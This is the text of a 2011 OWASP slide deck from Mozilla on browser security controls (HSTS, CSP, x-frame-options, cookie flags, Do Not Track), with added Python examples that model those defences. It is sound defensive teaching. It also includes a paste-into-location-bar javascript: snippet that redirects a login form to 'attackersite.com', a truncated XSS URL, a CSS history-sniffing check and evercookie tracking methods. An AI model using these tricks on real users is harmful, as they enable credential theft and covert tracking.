Page 1: Enabling Browser Security in Web Applications

Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

Enabling Browser Security in Web Applications

August 25, 2011
Michael Coates - Mozilla

Page 2: Enabling Browser Security in Web Applications

About

• Michael Coates
• Senior Manager, Mozilla
• Lead of Infrastructure Security Team

• [email protected]
• http://blog.mozilla.com/webappsec/
• http://michael-coates.blogspot.com
• @_mwc

Page 3: Enabling Browser Security in Web Applications

Agenda

• Locking Down SSL/TLS
• Stamping Out Cross Site Scripting
• Socio-Technical Attacks
• Privacy

Page 4: Enabling Browser Security in Web Applications

Locking Down SSL/TLS

• Fake certificate attack targets Facebook users in Syria (May 2011 - theregister.co.uk)
• How to Hijack Facebook Using Firesheep (October 2010 - pcworld.com)
• Internet traffic was routed via Chinese servers, U.S. military sites included (November 2010 - washingtontimes.com)
• Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers (June 2008 - wired.com)

Page 5: Enabling Browser Security in Web Applications

Risks of Insecure Communication

• High likelihood of attack
  • Open wifi, municipal wifi, malicious ISP
  • Easy to exploit

• High impact to user
  • Clandestine monitoring of population
  • Injection of incorrect/malicious content
  • No protection from any defensive systems
  • Design flaw in application

Page 6: Enabling Browser Security in Web Applications

Insecure Session Management

• Secure login over HTTPS
  • Password submitted encrypted
• Immediate redirect to HTTP
  • Session ID sent cleartext <-- vulnerability point

[Diagram: request/response exchange for https://site.com/login followed by http://site.com/profile; the session cookie set during the HTTPS login is sent again on the cleartext profile request. Labelled "Firesheep Attack".]

Page 7: Enabling Browser Security in Web Applications

Insecure Redirects

• User requests HTTP page, response redirects to HTTPS
• 302 Response is HTTP <-- Vulnerability Point

[Diagram: the browser sends an HTTP request for mybank.com; the 302 redirect to the HTTPS page travels back over plain HTTP, which is the vulnerability point.]

Page 8: Enabling Browser Security in Web Applications

Secure Design for Communication

• HTTP Strict Transport Security (HSTS)
• Opt-in security control
• Website instructs compatible browser to enable STS for site
• HSTS forces (for enabled site):
  • All communication over HTTPS
  • No insecure HTTP requests sent from browser
  • No option for user to override untrusted certificates

Page 9: Enabling Browser Security in Web Applications

Strict Transport Security

• Browser prevents HTTP requests to HSTS site
• Any request to site is “upgraded” to HTTPS
• No clear text HTTP traffic ever sent to HSTS site
• Browser assumes HTTPS for HSTS sites

[Diagram: the browser's http:// request for the HSTS site is rewritten to https:// before it is sent; no cleartext request reaches the network.]

Page 10: Enabling Browser Security in Web Applications

Cookie Forcing

• HSTS also protects against Cookie Forcing

Page 11: Enabling Browser Security in Web Applications

HSTS FAQ

• Is HSTS Cert Pinning? No
• Chicken and the Egg? Technically, but drastically less chance of attack
• Certificate Rotation Problem? No - HSTS forces valid certificate, doesn’t specify which
• Browser Support: Current: Firefox & Chrome
  https://www.owasp.org/index.php/HTTP_Strict_Transport_Security#Browser_Support
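The behaviour slides 8 through 11 describe (a site opts in with a Strict-Transport-Security response header, after which the browser rewrites any http:// request for that host to https:// before it is sent) is easiest to see by modelling the browser side. The following Python is an added example, not code from the talk or from Mozilla; it assumes the header's max-age and includeSubDomains directive syntax, and replays the slide-6 login flow with constructed header values to show the Firesheep-era cleartext request disappearing once the policy is recorded.

```python
"""Simulated HSTS-aware browser (added example, not code from the talk).
It models slides 8-11: a site opts in with a Strict-Transport-Security
header (assumed directive syntax: max-age and includeSubDomains), and the
browser then rewrites any http:// request for that host to https:// before
it leaves the machine."""
from urllib.parse import urlsplit, urlunsplit


class HstsCache:
    """Per-browser store of hosts that have opted in to HSTS."""

    def __init__(self):
        self.hosts = {}  # host -> True if includeSubDomains was set

    def process_response(self, url, headers):
        """Record a policy. Browsers only honour the header when it arrives
        over a clean HTTPS connection, so a header seen on http:// is ignored.
        Returns True if the cache changed."""
        parts = urlsplit(url)
        if parts.scheme != "https":
            return False
        value = headers.get("Strict-Transport-Security")
        if value is None:
            return False
        max_age, include_sub = None, False
        for directive in value.split(";"):
            name, _, arg = directive.strip().partition("=")
            name = name.strip().lower()
            if name == "max-age" and arg.strip().isdigit():
                max_age = int(arg.strip())
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None:
            return False  # malformed header: no max-age, nothing to record
        host = parts.hostname
        if max_age == 0:
            self.hosts.pop(host, None)  # max-age=0 tells the browser to forget the host
        else:
            self.hosts[host] = include_sub
        return True

    def is_hsts_host(self, host):
        host = host.lower()
        if host in self.hosts:
            return True
        labels = host.split(".")
        # a parent domain that set includeSubDomains covers this host too
        return any(self.hosts.get(".".join(labels[i:])) for i in range(1, len(labels)))

    def rewrite_request(self, url):
        """Return the URL the browser actually fetches (slide 9's 'upgrade')."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_hsts_host(parts.hostname):
            port = parts.port
            netloc = parts.hostname if port in (None, 80) else f"{parts.hostname}:{port}"
            return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))
        return url


def replay_login_flow(cache):
    """Replay slide 6's flow: HTTPS login, then a redirect to an http://
    profile page. With no HSTS entry the second request goes out in
    cleartext (the Firesheep case); once the login response has carried an
    STS header, the browser upgrades it, and a sibling host as well because
    of includeSubDomains. Header values are constructed for the example."""
    fetched = [cache.rewrite_request("https://site.com/login")]
    cache.process_response("https://site.com/login", {
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "Location": "http://site.com/profile",
    })
    fetched.append(cache.rewrite_request("http://site.com/profile"))
    fetched.append(cache.rewrite_request("http://mail.site.com/"))
    return fetched


if __name__ == "__main__":
    for u in replay_login_flow(HstsCache()):
        print("fetch", u)
```

Run the block directly to see the three fetched URLs; a fresh cache that never saw the header leaves http://site.com/profile untouched, which is exactly the request Firesheep captured.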

Page 12: Enabling Browser Security in Web Applications

Protecting Outdated Users

• HSTS supported in current browsers (Firefox, Chrome)
• Older browsers all support the SECURE cookie flag
• SECURE cookie flag
  • Instructs browser to only send cookie over HTTPS
  • Much less (and different) protection than HSTS, but a good defense in depth control

Page 13: Enabling Browser Security in Web Applications

Secure Flag

• SECURE flag doesn’t prevent HTTP requests like HSTS
• Just removes SECURE cookies from the HTTP request

[Diagram: the HTTPS response sets the session cookie with the SECURE flag; a later HTTP request to the site is still sent, but the browser strips the SECURE session cookie from it.]

Page 15: Enabling Browser Security in Web Applications

Cross Site Scripting

Page 16: Enabling Browser Security in Web Applications

Risks of XSS

• Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004)
• Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page
• Business Impact:
  • Compromise of user accounts
  • False data displayed on website
  • Remote monitoring of user actions with website
  • Full attacker control of content displayed and served from website

Page 17: Enabling Browser Security in Web Applications

XSS Example

[Screenshot: page source of a login form (<form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead"> with a hidden input named data[Login][referer]), a "Name:" field with a submit button, and the injected result: a fake "Login / Pass" form that submits to an evil site plus a script that installs malware.]

(1) Attacker submits malicious code
(2) Code is now part of webpage
(3) Malicious site steals passwords & installs malware
(4) Attacker spreads malicious URL: http://site.com/?a=%3cscript%3edocument%2e

Page 18: Enabling Browser Security in Web Applications

Frustrating Problem

• XSS issues can occur anywhere user data is used in a webpage
• Difficult to identify all output locations
• Many frameworks allow design patterns that lead to XSS issues

Page 19: Enabling Browser Security in Web Applications

Content Security Policy (CSP)

• CSP - New defensive control to eliminate XSS
• Allows web site to specify where JavaScript can be loaded from
• Injected JavaScript via XSS is rendered inert
• Violations & potential XSS attacks are reported to web site for investigation

[Screenshot: the "Name:" form with submit button, now served with a CSP policy]

CSP Policy: X-Content-Security-Policy: allow 'self'; img-src 'self' data:

Page 20: Enabling Browser Security in Web Applications

XSS Example with CSP

[Screenshot: page source of the login form (<form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead">, hidden input data[Login][referer] with value "/en-US/developers/addons" and id "LoginReferer"), the "Name:" field with submit button, and the injected script shown blocked.]

(1) Attacker submits malicious code
(2) CSP prevents script execution; violation report sent to site.com/CSPalert
(3) Site safe to use

Page 21: Enabling Browser Security in Web Applications

Implementing CSP

• Some code changes needed to externalize JavaScript
• Run CSP in report-only mode to test
• Enable CSP and protect users with browsers supporting CSP
• Receive alerts on potential vulnerabilities in the app and quickly address them to protect remaining users

Page 22: Enabling Browser Security in Web Applications

CSP Violation Reporting

• Violations of CSP policy reported to specified URL
• Acts as XSS intrusion detection system
• CSP supported in portion of site users, XSS IDS benefits all
• Reported data is from client, trust accordingly

X-Content-Security-Policy: allow 'self'; report-uri http://reportcollector.example.com/collector.cgi

Page 23: Enabling Browser Security in Web Applications

CSP Violation Reporting

[Diagram: the injected JavaScript is blocked and a violation report is sent to site.com/CSPalert]

CSP Violation Report includes:
• HTTP Request
• request-headers
• blocked-uri
• violation-directive
• original-policy

Page 24: Enabling Browser Security in Web Applications

CSP Violation Report
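Slides 21 through 23 describe a rollout (report-only first, then enforcing) and a report collector that treats CSP as an XSS intrusion detection system while remembering that every reported field comes from the client. The Python below is an added example, not code from the talk or from Mozilla. It uses the X-Content-Security-Policy header prefix the slides use and its -Report-Only twin for the test mode; the JSON shape of a report and its key names are assumptions based on the fields slide 23 lists and the Firefox report format of the time (with violated-directive standing for the slide's "violation-directive"); the sample report is constructed.

```python
"""CSP rollout headers and a violation-report collector (added example,
not code from the talk). Header names follow the X-Content-Security-Policy
prefix the slides use; the report's JSON layout and key names are assumed
from slide 23's field list and the Firefox report format of the time."""
import json

# collector URL taken from slide 22
COLLECTOR = "http://reportcollector.example.com/collector.cgi"


def csp_headers(report_only):
    """Slide 21's rollout: first report-only (nothing blocked, reports still
    sent), then the enforcing header once the app's inline script is gone."""
    name = "X-Content-Security-Policy" + ("-Report-Only" if report_only else "")
    return {name: "allow 'self'; img-src 'self' data:; report-uri " + COLLECTOR}


MAX_REPORT_BYTES = 4096
REQUIRED = ("blocked-uri", "violated-directive", "original-policy")
OPTIONAL = ("document-uri", "request-headers")


def parse_violation_report(body):
    """Parse one report body POSTed by a browser. Every field is attacker-
    influenceable (slide 22: trust accordingly), so bound its size, insist
    on the expected keys, coerce values to bounded strings, and return None
    for anything else rather than raising."""
    if len(body) > MAX_REPORT_BYTES:
        return None
    try:
        data = json.loads(body)
    except ValueError:
        return None
    report = data.get("csp-report") if isinstance(data, dict) else None
    if not isinstance(report, dict) or any(k not in report for k in REQUIRED):
        return None
    return {k: str(report[k])[:512] for k in REQUIRED + OPTIONAL if k in report}


def classify(report):
    """IDS-style verdict (slide 22). A blocked inline script under the
    script-controlling directive is the XSS signature; a blocked external
    host is more often a policy gap (a CDN the policy forgot)."""
    blocked = report["blocked-uri"]
    directive = report["violated-directive"].split(" ")[0]
    inline = blocked in ("self", "inline", "")  # 'self' in early Firefox reports, 'inline' later
    if inline and directive in ("allow", "default-src", "script-src"):
        return "possible-xss"
    return "policy-gap"


# constructed sample report, shaped as described above
SAMPLE_REPORT = json.dumps({"csp-report": {
    "document-uri": "http://site.com/profile",
    "blocked-uri": "self",
    "violated-directive": "allow 'self'",
    "original-policy": csp_headers(False)["X-Content-Security-Policy"],
    "request-headers": "Host: site.com",
}})


if __name__ == "__main__":
    parsed = parse_violation_report(SAMPLE_REPORT)
    print(classify(parsed), parsed["document-uri"], parsed["blocked-uri"])
```

The collector never echoes report fields into HTML or logs them unescaped; a report is itself untrusted input that an attacker can POST directly to the report-uri.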

Page 25: Enabling Browser Security in Web Applications

Other CSP Benefits

• Prevent ClickJacking via frame-ancestors
• Control embedded frames via frame-src
• Control domains for images via img-src
• Control target domains via xhr-src
• Enforce specific protocols (https://*.foo.com)
• Future enhancement to control actions & malicious forms

Page 26: Enabling Browser Security in Web Applications

Protecting Outdated Users

• HTTPOnly mitigates one of the XSS impacts - session hijacking
• Supported in all recent browsers
• Easy, opt-in security control to protect users

[Diagram: injected JavaScript attempts to read the session cookie (Cookie: SessionID) and send it to the Attacker’s Site]
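Slides 12 and 13 (the SECURE flag) and slide 26 (HTTPOnly) both describe cookie attributes whose effect is enforced by the browser, not the server. The Python below is an added example, not code from the talk or from Mozilla: it builds the Set-Cookie header a site would send and then models what the browser does with the stored cookie on an https:// request, on an http:// request, and when page script reads document.cookie. Cookie names and values are constructed.

```python
"""Session-cookie attributes as a browser applies them (added example, not
code from the talk). Models slides 12-13 (Secure: the cookie is withheld
from http:// requests, though the request itself still goes out) and
slide 26 (HttpOnly: page script cannot read the cookie, so injected
JavaScript cannot exfiltrate the session ID). Names and values are constructed."""


def set_cookie_header(name, value, secure=True, http_only=True):
    """Build the Set-Cookie response header for a session cookie."""
    parts = [f"{name}={value}", "Path=/"]
    if secure:
        parts.append("Secure")
    if http_only:
        parts.append("HttpOnly")
    return "Set-Cookie: " + "; ".join(parts)


class CookieJar:
    """Minimal model of the browser's cookie store for one site."""

    def __init__(self):
        self.cookies = []

    def store(self, header):
        _, _, body = header.partition(":")
        pieces = [p.strip() for p in body.split(";")]
        name, _, value = pieces[0].partition("=")
        flags = {p.lower() for p in pieces[1:]}
        self.cookies.append({"name": name, "value": value,
                             "secure": "secure" in flags,
                             "httponly": "httponly" in flags})

    def cookie_header_for(self, url):
        """Cookie: header the browser attaches to a request. Secure cookies
        are dropped on http:// (slide 13), but the request is still sent in
        cleartext; only HSTS (slide 9) stops that."""
        https = url.startswith("https://")
        return "; ".join(f"{c['name']}={c['value']}" for c in self.cookies
                         if https or not c["secure"])

    def document_cookie(self):
        """What document.cookie exposes to script on the page: HttpOnly
        cookies are hidden, so an XSS payload reading it gets no session ID."""
        return "; ".join(f"{c['name']}={c['value']}" for c in self.cookies
                         if not c["httponly"])


def demo():
    """Store a hardened session cookie and a plain preference cookie, then
    show what reaches an HTTPS request, an HTTP request, and page script."""
    jar = CookieJar()
    jar.store(set_cookie_header("SessionID", "c0nstructed-session-value"))
    jar.store(set_cookie_header("theme", "dark", secure=False, http_only=False))
    return {
        "https": jar.cookie_header_for("https://site.com/profile"),
        "http": jar.cookie_header_for("http://site.com/profile"),
        "script": jar.document_cookie(),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:>6}: {v!r}")
```

The "http" line of the output is the point of slide 13: the session ID is gone from the cleartext request, but the request (and any non-Secure cookie) still crosses the network.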

Page 27: Enabling Browser Security in Web Applications

Defensive Design

• CSP gaining traction, potential to solve pressing web security risk
• HTTPOnly flag - easy setting to add additional layer of defense
• OWASP XSS Prevention Cheat Sheet
  https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

Page 28: Enabling Browser Security in Web Applications

Socio-Technical Attacks: “Visual Fraud”

Page 29: Enabling Browser Security in Web Applications

ClickJacking

• Attacker includes victim page in iframe & overlays opaque layer
• Attacker’s image entices click and text interaction
• Clicks are registered on victim site underneath
• User inadvertently performs action at victim site

[Diagram: "Attacker’s Overlay" drawn on top of "Victim Site"]

Page 30: Enabling Browser Security in Web Applications

ClickJacking Example

[Mockup: the victim site’s "[ ] Grant Joe full profile access" checkbox and "Confirm" button sit underneath the attacker’s overlay, which reads "Click to follow Joe" and "Click the Bouncing Ball"]

Page 31: Enabling Browser Security in Web Applications

ClickJacking Defenses

• x-frame-options header
  • Full solution
  • Compatible with new versions of browsers
• Frame Busting Scripts
  • Partial solution
  • Compatible with older browsers

Page 32: Enabling Browser Security in Web Applications

x-frame-options

• Additional header for HTTP Response
• Instructs browser to disallow framing
• Two options - DENY, SAMEORIGIN

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Content-Length: 35236
x-frame-options: DENY

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Content-Length: 35236
x-frame-options: SAMEORIGIN

Page 33: Enabling Browser Security in Web Applications

x-frame-options

• Targeted site is not displayed if framed
• Error page displayed
• Prevents ClickJacking attack

[Diagram: "Attempted ClickJack" shows the Attacker’s Overlay on top of the Victim Site; "x-f-o Result" shows the error page in place of the victim site]
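Slides 31 through 33 describe x-frame-options as a decision the browser makes from one response header and the origins involved. The Python below is an added example, not code from the talk or from Mozilla: it pulls the header out of the two raw responses shown on slide 32 (reassembled with CRLF line endings) and evaluates DENY and SAMEORIGIN for the clickjacking scenario of slide 29. The hostnames victim.example and attacker.example are constructed, and refusing to frame on an unrecognised header value is this model's choice rather than documented browser behaviour.

```python
"""Evaluating the x-frame-options header the way a browser does (added
example, not code from the talk). Hostnames are constructed; the raw
responses are the ones on slide 32, reassembled with CRLF line endings."""
from urllib.parse import urlsplit

RESPONSE_DENY = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Content-Type: text/html;\r\n"
    "Vary: Accept-Encoding\r\n"
    "Content-Length: 35236\r\n"
    "x-frame-options: DENY\r\n"
    "\r\n"
)
RESPONSE_SAMEORIGIN = RESPONSE_DENY.replace("DENY", "SAMEORIGIN")


def parse_xfo(raw_response):
    """Pull x-frame-options out of a raw response; header names are
    case-insensitive, so match on the lowercased name."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "x-frame-options":
            return value.strip()
    return None


def origin(url):
    """(scheme, host, port) tuple; the same-origin comparison key."""
    p = urlsplit(url)
    port = p.port or {"http": 80, "https": 443}.get(p.scheme)
    return (p.scheme, p.hostname, port)


def framing_allowed(xfo, framed_url, top_url):
    """Decide whether the document at framed_url may render inside a frame
    whose top-level document is top_url. No header at all means the page
    is frameable by anyone (the clickjacking case on slide 29)."""
    if xfo is None:
        return True
    value = xfo.strip().upper()
    if value == "DENY":
        return False
    if value == "SAMEORIGIN":
        return origin(framed_url) == origin(top_url)
    # unrecognised value: browser handling varied, so this model refuses to frame
    return False


def clickjack_attempt(raw_response):
    """Slide 33's scenario: attacker.example frames the victim's settings
    page. Returns True if the victim page would render (attack possible)."""
    return framing_allowed(parse_xfo(raw_response),
                           "https://victim.example/settings",
                           "https://attacker.example/game")


if __name__ == "__main__":
    print("no header :", clickjack_attempt("HTTP/1.1 200 OK\r\n\r\n"))
    print("DENY      :", clickjack_attempt(RESPONSE_DENY))
    print("SAMEORIGIN:", clickjack_attempt(RESPONSE_SAMEORIGIN))
```

Note that SAMEORIGIN compares scheme as well as host: an https:// page framed by an http:// page of the same host is a different origin and is refused.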

Page 34: Enabling Browser Security in Web Applications

Frame Busting Scripts

• JavaScript within page to detect framing
• Will either “bust” the frame or not display content
• Not optimal solution - techniques available to bypass defense

<script>
  // Classic frame buster: if this document is not the top-level window,
  // navigate the top-level window to this document's own location.
  if (window.top !== window.self) {
    window.top.location = window.self.location;
  }
</script>

Page 35: Enabling Browser Security in Web Applications

URL Social Engineering

• “Cool new hidden feature”
• “Get 10 free gems for your game”
• Click the square and type the secret combination: ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter

Page 36: Enabling Browser Security in Web Applications

Danger of those keystrokes...

• click square - selected text element
• ctrl a - select all text
• ctrl c - copy text
• ctrl l - select location bar
• ctrl v - paste text
• enter - execute JavaScript

javascript:var xmlHttp;
xmlHttp=new XMLHttpRequest();
xmlHttp.open("GET", document.location, false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
var str=xmlDoc;
x.replace(/somesite\.com/, "attackersite.com");
document.writeln(x);

javascript:....

Page 37: Enabling Browser Security in Web Applications

URL JavaScript

• Pasted JavaScript has full control of page
• Can rewrite page
• Extract and send any data
• No indication to user

[Screenshots: "Before" - a username/password form with submit button on somesite.com; "After" - the same form with somesite.com replaced by attackersite.com]

Page 38: Enabling Browser Security in Web Applications

Defense

• Code change to browser
• Remove association between javascript: & loaded document
• Renders attack inert

Page 39: Enabling Browser Security in Web Applications

Privacy

• Your Android Phone is Tracking You (April 2011 - pcworld.com)
• Nissan car secretly shares driver data with websites (June 2011 - theregister.co.uk)
• Your iPhone Is Tracking Your Every Move (April 2011 - readwriteweb.com)
• Mobile-App Makers Face U.S. Privacy Investigation (April 2011 - online.wsj.com)

Page 40: Enabling Browser Security in Web Applications

Privacy

• Business gains from gathering user data
• Privacy infringement based on laws
• Privacy concerns based on user expectations
• Need better options for user to understand collected data, control flow and accessibility of user data

Page 41: Enabling Browser Security in Web Applications

Browser Profiling

• Panopticlick
• Fingerprints browser based on provided information
  • Plugins installed
  • Font Support
  • Screen Resolution
  • Time Zone

“Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information.”

Page 42: Enabling Browser Security in Web Applications

CSS History Sniffing

• Determine user’s browsing habits with CSS
• Visited link different than non-visited link
• CSS and element inspection determines visited pages
• Issue fixed March 2010

[Diagram: "Visited Link" styled differently from "Unvisited Link"]

if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") {
  // link.href has not been visited
} else {
  // link.href has been visited
}

http://dbaron.org/mozilla/visited-privacy

Page 43: Enabling Browser Security in Web Applications

Evercookie

“Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.”

• Multiple methods of storing data on the client
• Could be abused for unauthorized tracking
• Goal: keep user in control of data storage / tracking mechanisms

• Standard HTTP Cookies
• Local Shared Objects (Flash Cookies)
• Silverlight Isolated Storage
• Storing cookies in RGB values of auto-generated, force-cached PNGs, using HTML5 Canvas tag to read pixels (cookies) back out
• Storing cookies in Web History
• Storing cookies in HTTP ETags
• Storing cookies in Web cache
• window.name caching
• Internet Explorer userData storage
• HTML5 Session Storage
• HTML5 Local Storage
• HTML5 Global Storage
• HTML5 Database Storage via SQLite

http://samy.pl/evercookie/

Page 44: Enabling Browser Security in Web Applications

Do Not Track

• Adds header DNT: 1 to all web requests
• Tells websites user does not want browsing activity to be tracked

http://dnt.mozilla.org/

Page 45: Enabling Browser Security in Web Applications

Permission Manager

• Granular management options for user interaction with sites
• Control:
  • Location Settings
  • Cookie Settings
  • Popup Windows
  • Offline Storage

about:permissions

Page 46: Enabling Browser Security in Web Applications

Privacy Design

• Privacy controls distinguish applications
• Design with privacy in mind
• Growing support for DNT

Page 47: Enabling Browser Security in Web Applications

Closing

• Defense In Depth
• Many new security controls to enhance security
  • Strict Transport Security
  • Content Security Policy
  • x-frame-options
  • Do Not Track

